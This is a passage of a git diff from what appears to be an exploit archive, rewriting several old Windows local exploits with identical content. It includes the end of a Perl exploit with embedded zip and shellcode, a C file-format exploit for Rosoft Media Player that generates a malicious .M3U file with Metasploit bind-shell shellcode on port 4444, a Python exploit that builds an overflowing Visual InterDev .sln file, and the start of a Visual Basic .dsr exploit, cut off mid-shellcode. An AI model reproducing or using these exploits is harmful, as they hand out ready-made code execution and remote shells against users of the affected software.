+"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
+"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
+"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\xE8\x87".
+"\xA0\x94\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
+"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
+"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
+"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
+"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
+"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
+"\x88\x88\x88\x88\x88\x88\x88\x88\xBE\x57\x8A\x89\x88\x88\x88".
+"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x7E".
+"\x38\x66\x12\x11\x11\x11\x11\x11\x11\x11\xD1\x7F\x51\x40\xDF".
+"\x9E\x34\xA5\xD4\xB9\x9D\xE3\xA6\x4C\x93\x72\xB8\xDB\x19\x76".
+"\x4A\x69\x91\x50\x93\xBD\xF3\xE6\x79\x5D\xCE\x70\x20\xD9\xF0".
+"\xD6\x7B\xE4\x8B\xE4\x4E\x67\xD5\x2C\x29\x4F\x8F\x3D\x6B\x52".
+"\xBD\x27\xE8\x0E\x84\xF4\xF1\x33\xE7\x54\x07\x75\x79\x0A\x8E".
+"\x9B\x06\xEB\x2B\xC3\x41\x5F\x75\xCC\x95\x11\x16\x95\xD0\x57".
+"\x0E\x77\x7B\x43\x3E\x29\x87\x7E\xE1\xB8\xEE\x63\x58\xA7\xDB".
+"\xD9\x24\xE5\x69\xB1\xFD\x3A\xEC\x76\xBB\x14\x67\xB8\x6A\xBC".
+"\x55\x52\xFE\x08\xC7\x86\x44\x2E\xCD\xE9\x0C\x07\x02\x52\xA6".
+"\xC5\x5E\xE4\x9D\x56\x57\xED\x09\x25\xD7\x67\xA4\x66\xA5\xA6".
+"\xA5\xA6\xDB\x2F\x4C\xFE\x65\x9D\xD7\xE5\x9B\xE6\xF5\x7B\x92".
+"\x33\x53\x47\xA7\x3A\xE4\x9C\x5B\x2F\x12\xBA\x57\xBF\xC7\xA9".
+"\xC7\xAC\x5C\x01\x7F\xAA\xB3\xA6\xA6\xCA\x93\x6A\x5E\xAE\x47".
+"\x52\xED\xF4\x7B\x22\x0D\x4E\x9C\x34\xA5\x48\xAA\x73\x63\x3B".
+"\x4A\xB6\xF7\xC9\xCA\xF8\x6C\x25\x2D\xD3\x9E\x6E\x7E\x93\x53".
+"\x60\x37\x2B\xD9\x19\x38\x27\xCB\xEE\xE8\xAB\xA4\x8F\xCE\x33".
+"\xCC\x4A\x5A\x96\x79\x4E\x9A\x23\x3D\x1F\x95\xD1\x19\xD2\x78".
+"\xD3\x09\x8C\xF0\xC7\xB1\x23\xF4\x84\x66\x5C\x9A\x9F\x9F\x37".
+"\xE3\x17\xF9\xFA\xD0\x98\xD8\x81\xA6\xA5\x5F\x60\x14\xE4\x67".
+"\x66\x67\x39\x8C\x82\xBC\xD1\x79\x0E\x23\x2F\x23\x2F\x7B\x5C".
+"\x46\x5A\x66\x46\x76\x81\xC3\x9E\x61\x64\x8E\xCB\xBB\x20\xC7".
+"\x9E\x9D\xED\x90\x8E\x4F\x7A\x7D\x76\xD0\x23\x8D\xFE\x07\x50".
+"\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x08\x00\x56\xAC\x3F\x36".
+"\xC5\xE1\x2E\x98\x9A\x0A\x00\x00\x5C\xC2\x01\x00\x1E\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00".
+"\x53\x59\x53\x5F\x34\x39\x31\x35\x32\x5F\x4D\x50\x34\x5F\x66".
+"\x6F\x72\x5F\x6D\x70\x6C\x61\x79\x65\x72\x32\x2E\x6D\x70\x34".
+"\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x4C\x00\x00".
+"\x00\xD6\x0A\x00\x00\x00\x00";
+
+my $shellcode = # code 724982
+"\x2B\xC9\x83\xE9\xB0\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13".
+"\xC6\x5A\x9C\xA1\x83\xEB\xFC\xE2\xF4\x3A\x30\x77\xEC\x2E\xA3".
+"\x63\x5E\x39\x3A\x17\xCD\xE2\x7E\x17\xE4\xFA\xD1\xE0\xA4\xBE".
+"\x5B\x73\x2A\x89\x42\x17\xFE\xE6\x5B\x77\xE8\x4D\x6E\x17\xA0".
+"\x28\x6B\x5C\x38\x6A\xDE\x5C\xD5\xC1\x9B\x56\xAC\xC7\x98\x77".
+"\x55\xFD\x0E\xB8\x89\xB3\xBF\x17\xFE\xE2\x5B\x77\xC7\x4D\x56".
+"\xD7\x2A\x99\x46\x9D\x4A\xC5\x76\x17\x28\xAA\x7E\x80\xC0\x05".
+"\x6B\x47\xC5\x4D\x19\xAC\x2A\x86\x56\x17\xD1\xDA\xF7\x17\xE1".
+"\xCE\x04\xF4\x2F\x88\x54\x70\xF1\x39\x8C\xFA\xF2\xA0\x32\xAF".
+"\x93\xAE\x2D\xEF\x93\x99\x0E\x63\x71\xAE\x91\x71\x5D\xFD\x0A".
+"\x63\x77\x99\xD3\x79\xC7\x47\xB7\x94\xA3\x93\x30\x9E\x5E\x16".
+"\x32\x45\xA8\x33\xF7\xCB\x5E\x10\x09\xCF\xF2\x95\x09\xDF\xF2".
+"\x85\x09\x63\x71\xA0\x32\x5C\xA1\xA0\x09\x15\x40\x53\x32\x38".
+"\xBB\xB6\x9D\xCB\x5E\x10\x30\x8C\xF0\x93\xA5\x4C\xC9\x62\xF7".
+"\xB2\x48\x91\xA5\x4A\xF2\x93\xA5\x4C\xC9\x23\x13\x1A\xE8\x91".
+"\xA5\x4A\xF1\x92\x0E\xC9\x5E\x16\xC9\xF4\x46\xBF\x9C\xE5\xF6".
+"\x39\x8C\xC9\x5E\x16\x3C\xF6\xC5\xA0\x32\xFF\xCC\x4F\xBF\xF6".
+"\xF1\x9F\x73\x50\x28\x21\x30\xD8\x28\x24\x6B\x5C\x52\x6C\xA4".
+"\xDE\x8C\x38\x18\xB0\x32\x4B\x20\xA4\x0A\x6D\xF1\xF4\xD3\x38".
+"\xE9\x8A\x5E\xB3\x1E\x63\x77\x9D\x0D\xCE\xF0\x97\x0B\xF6\xA0".
+"\x97\x0B\xC9\xF0\x39\x8A\xF4\x0C\x1F\x5F\x52\xF2\x39\x8C\xF6".
+"\x5E\x39\x6D\x63\x71\x4D\x0D\x60\x22\x02\x3E\x63\x77\x94\xA5".
+"\x4C\xC9\x29\x94\x7C\xC1\x95\xA5\x4A\x5E\x16\x5A\x9C\xA1";
+
+open(code, ">tempzip.zip") || die "Can't Write temporary File\n";
+binmode (code);
+print code $zip_data;
+close (code);
+print "\nTemporary file ready, patching..\n";
+my $zip = Archive::Zip->new();
+$zip->read( 'tempzip.zip' ) ;
+$zip->extractMember( 'SYS_49152_MP4_for_mplayer2.mp4' );
+open(code, "+));
+print "\nAddress added, have fun!\n";
+close (code);
+#indeed this sploit could have been written better without the ret address hassle,
+#but it's intended to be only a POC, not a weapon for kiddies..
+
+# milw0rm.com [2007-12-08]
diff --git a/platforms/windows/local/4749.c b/platforms/windows/local/4749.c
index 03d430048..bc65efef4 100755
--- a/platforms/windows/local/4749.c
+++ b/platforms/windows/local/4749.c
@@ -1,116 +1,116 @@
-/* rosoft-player-expl.c: 2007-12-18:
- *
- * Copyright (c) 2007 devcode
- *
- *
- *          ^^ D E V C O D E ^^
- *
- * Rosoft Media Player <= 4.1.7 .M3U Stack Overflow
- * [0-DAY]
- *
- *
- * Description:
- *    A stack overflow occurs when parsing an .m3u file
- *    which does not contain any delimiters.
- *
- * Hotfix/Patch:
- *    None.
- *
- * Vulnerable systems:
- *    Rosoft Media Player <= 4.1.7
- *
- * Tested on:
- *    Rosoft Media Player 4.1.7
- *
- *    This is a PoC and was created for educational purposes only. The
- *    author is not held responsible if this PoC does not work or is
- *    used for any other purposes than the one stated above.
- *
- * Notes:
- *    Nothing much here, except the player itself is a piece of shit.
- *    The vulnerability was found by Juan Pablo Lopez Yacubian
- *    (jplopezy_at_gmail.com). Come to think of it, the entire suite
- *    of products offered by Rosoft Engineering sucks bawls.
- *
- */
-#include 
-#include 
-
-/**
- * Invalid chars: 0x1A 0xA 0xD 0x00
- * win32_bind -
- * EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub
- * http://metasploit.com
- */
-unsigned char uszShellcode[] =
-    "\x90\x90\x90\x90\x90\x90\x90\x90"
-    "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x60"
-    "\x90\xf0\xf7\x83\xeb\xfc\xe2\xf4\x9c\xfa\x1b\xba\x88\x69\x0f\x08"
-    "\x9f\xf0\x7b\x9b\x44\xb4\x7b\xb2\x5c\x1b\x8c\xf2\x18\x91\x1f\x7c"
-    "\x2f\x88\x7b\xa8\x40\x91\x1b\xbe\xeb\xa4\x7b\xf6\x8e\xa1\x30\x6e"
-    "\xcc\x14\x30\x83\x67\x51\x3a\xfa\x61\x52\x1b\x03\x5b\xc4\xd4\xdf"
-    "\x15\x75\x7b\xa8\x44\x91\x1b\x91\xeb\x9c\xbb\x7c\x3f\x8c\xf1\x1c"
-    "\x63\xbc\x7b\x7e\x0c\xb4\xec\x96\xa3\xa1\x2b\x93\xeb\xd3\xc0\x7c"
-    "\x20\x9c\x7b\x87\x7c\x3d\x7b\xb7\x68\xce\x98\x79\x2e\x9e\x1c\xa7"
-    "\x9f\x46\x96\xa4\x06\xf8\xc3\xc5\x08\xe7\x83\xc5\x3f\xc4\x0f\x27"
-    "\x08\x5b\x1d\x0b\x5b\xc0\x0f\x21\x3f\x19\x15\x91\xe1\x7d\xf8\xf5"
-    "\x35\xfa\xf2\x08\xb0\xf8\x29\xfe\x95\x3d\xa7\x08\xb6\xc3\xa3\xa4"
-    "\x33\xc3\xb3\xa4\x23\xc3\x0f\x27\x06\xf8\xe1\xab\x06\xc3\x79\x16"
-    "\xf5\xf8\x54\xed\x10\x57\xa7\x08\xb6\xfa\xe0\xa6\x35\x6f\x20\x9f"
-    "\xc4\x3d\xde\x1e\x37\x6f\x26\xa4\x35\x6f\x20\x9f\x85\xd9\x76\xbe"
-    "\x37\x6f\x26\xa7\x34\xc4\xa5\x08\xb0\x03\x98\x10\x19\x56\x89\xa0"
-    "\x9f\x46\xa5\x08\xb0\xf6\x9a\x93\x06\xf8\x93\x9a\xe9\x75\x9a\xa7"
-    "\x39\xb9\x3c\x7e\x87\xfa\xb4\x7e\x82\xa1\x30\x04\xca\x6e\xb2\xda"
-    "\x9e\xd2\xdc\x64\xed\xea\xc8\x5c\xcb\x3b\x98\x85\x9e\x23\xe6\x08"
-    "\x15\xd4\x0f\x21\x3b\xc7\xa2\xa6\x31\xc1\x9a\xf6\x31\xc1\xa5\xa6"
-    "\x9f\x40\x98\x5a\xb9\x95\x3e\xa4\x9f\x46\x9a\x08\x9f\xa7\x0f\x27"
-    "\xeb\xc7\x0c\x74\xa4\xf4\x0f\x21\x32\x6f\x20\x9f\x8f\x5e\x10\x97"
-    "\x33\x6f\x26\x08\xb0\x90\xf0\xf7";
-
-int main( int argc, char **argv ) {
-    FILE *f = NULL;
-    char *p = NULL;
-
-    printf( "\n\tRosoft Media Player <= 4.1.7 .M3U Stack Overflow\n\n" );
-    printf( "\t\tCopyright (c) 2007 devcode\n\n\n" );
-
-    if ( argc < 2 ) {
-        printf( "Usage: %s \n", argv[0] );
-        return -1;
-    }
-   
-    f = fopen( argv[1], "w+" );
-    if ( !f ) {
-        printf( "[-] Unable to create m3u file.\n" );
-        return -1;
-    }
-
-    p = (char *)malloc( 5000 );
-    memset( p, 0x41, 5000 );
-
-    /**
-     * We need a valid address here that contains
-     * a value of 0 and is writable, and of course,
-     * no 0x00s in the address itself. Try 0x1270FE0 
-     * if 0x7FFDFFF0 doesn't work.
-     */
-    memcpy( p+4096, "\xF0\xFF\xFD\x7F", 4 );
-
-    /**
-     * Windows XP SP2 Pro - jmp esp (0x7C941EED, ntdll.dll)
-     */
-    memcpy( p+4104, "\xED\x1E\x94\x7C", 4 );
-    memcpy( p+4108, uszShellcode, sizeof( uszShellcode ) );
-
-    /**
-     * Cleanup
-     */
-    fputs( p, f );
-    fclose( f );
-    free( p );
-
-    printf( "[*] File generated succesfully!\n" );
-    return 0;
-}
-
-// milw0rm.com [2007-12-18]
+/* rosoft-player-expl.c: 2007-12-18:
+ *
+ * Copyright (c) 2007 devcode
+ *
+ *
+ *          ^^ D E V C O D E ^^
+ *
+ * Rosoft Media Player <= 4.1.7 .M3U Stack Overflow
+ * [0-DAY]
+ *
+ *
+ * Description:
+ *    A stack overflow occurs when parsing an .m3u file
+ *    which does not contain any delimiters.
+ *
+ * Hotfix/Patch:
+ *    None.
+ *
+ * Vulnerable systems:
+ *    Rosoft Media Player <= 4.1.7
+ *
+ * Tested on:
+ *    Rosoft Media Player 4.1.7
+ *
+ *    This is a PoC and was created for educational purposes only. The
+ *    author is not held responsible if this PoC does not work or is
+ *    used for any other purposes than the one stated above.
+ *
+ * Notes:
+ *    Nothing much here, except the player itself is a piece of shit.
+ *    The vulnerability was found by Juan Pablo Lopez Yacubian
+ *    (jplopezy_at_gmail.com). Come to think of it, the entire suite
+ *    of products offered by Rosoft Engineering sucks bawls.
+ *
+ */
+#include 
+#include 
+
+/**
+ * Invalid chars: 0x1A 0xA 0xD 0x00
+ * win32_bind -
+ * EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub
+ * http://metasploit.com
+ */
+unsigned char uszShellcode[] =
+    "\x90\x90\x90\x90\x90\x90\x90\x90"
+    "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x60"
+    "\x90\xf0\xf7\x83\xeb\xfc\xe2\xf4\x9c\xfa\x1b\xba\x88\x69\x0f\x08"
+    "\x9f\xf0\x7b\x9b\x44\xb4\x7b\xb2\x5c\x1b\x8c\xf2\x18\x91\x1f\x7c"
+    "\x2f\x88\x7b\xa8\x40\x91\x1b\xbe\xeb\xa4\x7b\xf6\x8e\xa1\x30\x6e"
+    "\xcc\x14\x30\x83\x67\x51\x3a\xfa\x61\x52\x1b\x03\x5b\xc4\xd4\xdf"
+    "\x15\x75\x7b\xa8\x44\x91\x1b\x91\xeb\x9c\xbb\x7c\x3f\x8c\xf1\x1c"
+    "\x63\xbc\x7b\x7e\x0c\xb4\xec\x96\xa3\xa1\x2b\x93\xeb\xd3\xc0\x7c"
+    "\x20\x9c\x7b\x87\x7c\x3d\x7b\xb7\x68\xce\x98\x79\x2e\x9e\x1c\xa7"
+    "\x9f\x46\x96\xa4\x06\xf8\xc3\xc5\x08\xe7\x83\xc5\x3f\xc4\x0f\x27"
+    "\x08\x5b\x1d\x0b\x5b\xc0\x0f\x21\x3f\x19\x15\x91\xe1\x7d\xf8\xf5"
+    "\x35\xfa\xf2\x08\xb0\xf8\x29\xfe\x95\x3d\xa7\x08\xb6\xc3\xa3\xa4"
+    "\x33\xc3\xb3\xa4\x23\xc3\x0f\x27\x06\xf8\xe1\xab\x06\xc3\x79\x16"
+    "\xf5\xf8\x54\xed\x10\x57\xa7\x08\xb6\xfa\xe0\xa6\x35\x6f\x20\x9f"
+    "\xc4\x3d\xde\x1e\x37\x6f\x26\xa4\x35\x6f\x20\x9f\x85\xd9\x76\xbe"
+    "\x37\x6f\x26\xa7\x34\xc4\xa5\x08\xb0\x03\x98\x10\x19\x56\x89\xa0"
+    "\x9f\x46\xa5\x08\xb0\xf6\x9a\x93\x06\xf8\x93\x9a\xe9\x75\x9a\xa7"
+    "\x39\xb9\x3c\x7e\x87\xfa\xb4\x7e\x82\xa1\x30\x04\xca\x6e\xb2\xda"
+    "\x9e\xd2\xdc\x64\xed\xea\xc8\x5c\xcb\x3b\x98\x85\x9e\x23\xe6\x08"
+    "\x15\xd4\x0f\x21\x3b\xc7\xa2\xa6\x31\xc1\x9a\xf6\x31\xc1\xa5\xa6"
+    "\x9f\x40\x98\x5a\xb9\x95\x3e\xa4\x9f\x46\x9a\x08\x9f\xa7\x0f\x27"
+    "\xeb\xc7\x0c\x74\xa4\xf4\x0f\x21\x32\x6f\x20\x9f\x8f\x5e\x10\x97"
+    "\x33\x6f\x26\x08\xb0\x90\xf0\xf7";
+
+int main( int argc, char **argv ) {
+    FILE *f = NULL;
+    char *p = NULL;
+
+    printf( "\n\tRosoft Media Player <= 4.1.7 .M3U Stack Overflow\n\n" );
+    printf( "\t\tCopyright (c) 2007 devcode\n\n\n" );
+
+    if ( argc < 2 ) {
+        printf( "Usage: %s \n", argv[0] );
+        return -1;
+    }
+   
+    f = fopen( argv[1], "w+" );
+    if ( !f ) {
+        printf( "[-] Unable to create m3u file.\n" );
+        return -1;
+    }
+
+    p = (char *)malloc( 5000 );
+    memset( p, 0x41, 5000 );
+
+    /**
+     * We need a valid address here that contains
+     * a value of 0 and is writable, and of course,
+     * no 0x00s in the address itself. Try 0x1270FE0 
+     * if 0x7FFDFFF0 doesn't work.
+     */
+    memcpy( p+4096, "\xF0\xFF\xFD\x7F", 4 );
+
+    /**
+     * Windows XP SP2 Pro - jmp esp (0x7C941EED, ntdll.dll)
+     */
+    memcpy( p+4104, "\xED\x1E\x94\x7C", 4 );
+    memcpy( p+4108, uszShellcode, sizeof( uszShellcode ) );
+
+    /**
+     * Cleanup
+     */
+    fputs( p, f );
+    fclose( f );
+    free( p );
+
+    printf( "[*] File generated succesfully!\n" );
+    return 0;
+}
+
+// milw0rm.com [2007-12-18]
diff --git a/platforms/windows/local/4892.py b/platforms/windows/local/4892.py
index e87d799d1..43221d830 100755
--- a/platforms/windows/local/4892.py
+++ b/platforms/windows/local/4892.py
@@ -1,89 +1,89 @@
-#usage: exploit.py FileName
-
-import sys
-
-print "------------------------------------------------------------------------"
-print ' Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow'
-print " author: shinnai"
-print " mail: shinnai[at]autistici[dot]org"
-print " site: http://shinnai.altervista.org\n"
-print " I really have much fun exploiting this one :)"
-print " We need to patch five exceptions before we can have EIP:\n"
-print " #7C80A268   8801             MOV BYTE PTR DS:[ECX],AL"
-print " #ECX 42424242      <--       to patch with jumper 0x7E3FBEFF"
-print "------------------------------------------------------------------------"
-
-buff      = "A" * 1764
-
-jumper    = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll
-
-buff2     = "A" * 4
-
-buff3     = "A" * 24
-
-buff4     = "A" * 16
-
-buff5     = "A" * 4
-
-nop       = "\x90\x90\x90\x90"
-
-shellcode = \
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+\
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+\
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+\
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+\
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"+\
-"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"+\
-"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"+\
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"+\
-"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"+\
-"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+\
-"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"+\
-"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"+\
-"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"+\
-"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+\
-"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"+\
-"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"+\
-"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"+\
-"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"+\
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"+\
-"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"+\
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"+\
-"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
-
-#execute calc.exe
-
-buff6     = "A" * 8
-
-get_EIP   = "\xFF\xB9\x3F\x7E" #call EBP from user32.dll
-
-buff7     = "A" * 56
-
-try:
-    sln_file = \
-        'Microsoft Visual Studio Solution File, Format Version 1.00\n'+\
-        'Project("{00000000-0000-0000-0000-000000000000}") = "CAB2", "' + buff + jumper + buff2 + jumper + buff3 + jumper + buff4 + jumper + buff5 + nop + shellcode + nop + '", "' + jumper + buff6 + get_EIP + buff7 + '"\n'+\
-	'EndProject\n'+\
-        'Global\n'+\
-        '	GlobalSection(LocalDeployment) = postSolution\n'+\
-        '		StartupProject = {00000000-0000-0000-0000-000000000000}\n'+\
-        '	EndGlobalSection\n'+\
-        '	GlobalSection(BuildOrder) = postSolution\n'+\
-        '		0 = {00000000-0000-0000-0000-000000000000}\n'+\
-        '	EndGlobalSection\n'+\
-        '	GlobalSection(DeploymentRoot) = postSolution\n'+\
-        '	EndGlobalSection\n'+\
-        'VersionCompanyName="xxx"\n'+\
-        'EndGlobal'
-    
-    out_file = open(sys.argv[1] + ".sln",'w')
-    out_file.write(sln_file)
-    out_file.close()
-    print "\nFILE CREATION COMPLETED!\n"
-except:
-    print " \n -------------------------------------"
-    print "  Usage: exploit.py FileName"
-    print " -------------------------------------"
-    print "\nAN ERROR OCCURS DURING FILE CREATION!"
-
-# milw0rm.com [2008-01-11]
+#usage: exploit.py FileName
+
+import sys
+
+print "------------------------------------------------------------------------"
+print ' Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow'
+print " author: shinnai"
+print " mail: shinnai[at]autistici[dot]org"
+print " site: http://shinnai.altervista.org\n"
+print " I really have much fun exploiting this one :)"
+print " We need to patch five exceptions before we can have EIP:\n"
+print " #7C80A268   8801             MOV BYTE PTR DS:[ECX],AL"
+print " #ECX 42424242      <--       to patch with jumper 0x7E3FBEFF"
+print "------------------------------------------------------------------------"
+
+buff      = "A" * 1764
+
+jumper    = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll
+
+buff2     = "A" * 4
+
+buff3     = "A" * 24
+
+buff4     = "A" * 16
+
+buff5     = "A" * 4
+
+nop       = "\x90\x90\x90\x90"
+
+shellcode = \
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+\
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+\
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+\
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+\
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"+\
+"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"+\
+"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"+\
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"+\
+"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"+\
+"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+\
+"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"+\
+"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"+\
+"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"+\
+"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+\
+"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"+\
+"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"+\
+"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"+\
+"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"+\
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"+\
+"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"+\
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"+\
+"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
+
+#execute calc.exe
+
+buff6     = "A" * 8
+
+get_EIP   = "\xFF\xB9\x3F\x7E" #call EBP from user32.dll
+
+buff7     = "A" * 56
+
+try:
+    sln_file = \
+        'Microsoft Visual Studio Solution File, Format Version 1.00\n'+\
+        'Project("{00000000-0000-0000-0000-000000000000}") = "CAB2", "' + buff + jumper + buff2 + jumper + buff3 + jumper + buff4 + jumper + buff5 + nop + shellcode + nop + '", "' + jumper + buff6 + get_EIP + buff7 + '"\n'+\
+	'EndProject\n'+\
+        'Global\n'+\
+        '	GlobalSection(LocalDeployment) = postSolution\n'+\
+        '		StartupProject = {00000000-0000-0000-0000-000000000000}\n'+\
+        '	EndGlobalSection\n'+\
+        '	GlobalSection(BuildOrder) = postSolution\n'+\
+        '		0 = {00000000-0000-0000-0000-000000000000}\n'+\
+        '	EndGlobalSection\n'+\
+        '	GlobalSection(DeploymentRoot) = postSolution\n'+\
+        '	EndGlobalSection\n'+\
+        'VersionCompanyName="xxx"\n'+\
+        'EndGlobal'
+    
+    out_file = open(sys.argv[1] + ".sln",'w')
+    out_file.write(sln_file)
+    out_file.close()
+    print "\nFILE CREATION COMPLETED!\n"
+except:
+    print " \n -------------------------------------"
+    print "  Usage: exploit.py FileName"
+    print " -------------------------------------"
+    print "\nAN ERROR OCCURS DURING FILE CREATION!"
+
+# milw0rm.com [2008-01-11]
diff --git a/platforms/windows/local/4938.py b/platforms/windows/local/4938.py
index aa35302a8..2fd9b3a15 100755
--- a/platforms/windows/local/4938.py
+++ b/platforms/windows/local/4938.py
@@ -1,127 +1,127 @@
-#usage: exploit.py
-
-import time
-
-print "---------------------------------------------------------------------------"
-print ' MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling Buffer Overflow\n'
-print " author: shinnai"
-print " mail: shinnai[at]autistici[dot]org"
-print " site: http://shinnai.altervista.org\n"
-print " Once you create the file, open it with Visual Basic 6 and click on"
-print " connection or command name."
-print "---------------------------------------------------------------------------"
-
-EIP = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll
-
-nop = "\x90\x90\x90\x90"
-
-shellcode = \
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+\
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+\
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+\
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+\
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"+\
-"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"+\
-"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"+\
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"+\
-"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"+\
-"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+\
-"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"+\
